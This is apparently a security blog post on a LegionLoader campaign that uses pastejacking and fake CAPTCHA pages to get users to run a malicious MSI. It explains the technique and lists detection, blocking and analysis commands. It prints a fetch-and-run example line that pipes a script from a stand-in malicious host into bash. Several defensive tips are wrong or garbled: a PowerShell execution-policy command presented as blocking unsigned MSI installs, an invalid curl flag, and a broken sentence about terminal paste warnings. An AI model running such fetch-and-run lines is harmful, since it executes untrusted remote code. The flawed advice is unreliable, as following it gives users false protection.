A web campaign uses pastejacking/ClipboardHijacking method to lure viewers into installing an MSI for LegionLoader malware

By /

Listen to this Post

A recent campaign employs pastejacking (clipboard hijacking) to trick users into downloading an MSI file containing LegionLoader malware. Attackers use deceptive techniques like:
– CAPTCHA/turnstile pages to appear legitimate.
– Disguising malicious domains as blog sites.
– Manipulating users into pasting and executing malicious commands.

More info: https://bit.ly/4hWXwNM

You Should Know:

How Pastejacking Works

Attackers replace clipboard content with malicious commands when users copy text from a website. For example:
– Original text: `curl -s https://safe-site.com/install.sh | bash`
– Malicious replacement: `curl -s http://malicious-site.com/evil.sh | bash`

Detection & Prevention

1. Verify Before Pasting

  • On Linux/macOS: Use `Ctrl+Shift+V` (terminal) or `pbpaste | less` to inspect clipboard.
  • On Windows: Use Clipboard Viewer (clipbrd in older versions).

2. Disable Automatic Clipboard Execution

  • In Linux, modify terminal settings to warn before pasting commands with “ prefix.
  • In Windows, disable clipboard sync in Settings > System > Clipboard.

3. Check URLs Before Downloading

  • Use `curl -I ` to inspect HTTP headers before downloading.
  • Example: 
    curl -I https://yoyep.co.za/download.msi

4. Monitor Suspicious Processes

  • Linux: `ps aux | grep -i “msiexec\|curl\|wget”`
  • Windows: `tasklist | findstr “msiexec”`

5. Block Malicious Domains

  • Add to `/etc/hosts` (Linux/macOS) or Windows `hosts` file: 
    127.0.0.1 yoyep.co.za

Malware Analysis Commands

  • Extract MSI Contents: 
    msiextract LegionLoader.msi
  • Check File Hashes: 
    sha256sum LegionLoader.msi
  • Inspect Network Traffic: 
    tcpdump -i eth0 'host yoyep.co.za' -w traffic.pcap

What Undercode Say

Pastejacking exploits user trust in copy-paste actions. Always:

  • Audit clipboard content before execution.
  • Use `–show-progress` in `curl/wget` to detect unexpected downloads.
  • Monitor child processes with: 
    strace -f -e execve -p <PID>
  • Windows defenders should block unsigned MSI installs via: 
    Set-ExecutionPolicy -ExecutionPolicy Restricted

Expected Output:

LegionLoader campaign uses CAPTCHA cloaking & pastejacking. Verify before pasting!

References:

Reported By: Unit42 Pastejacking – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: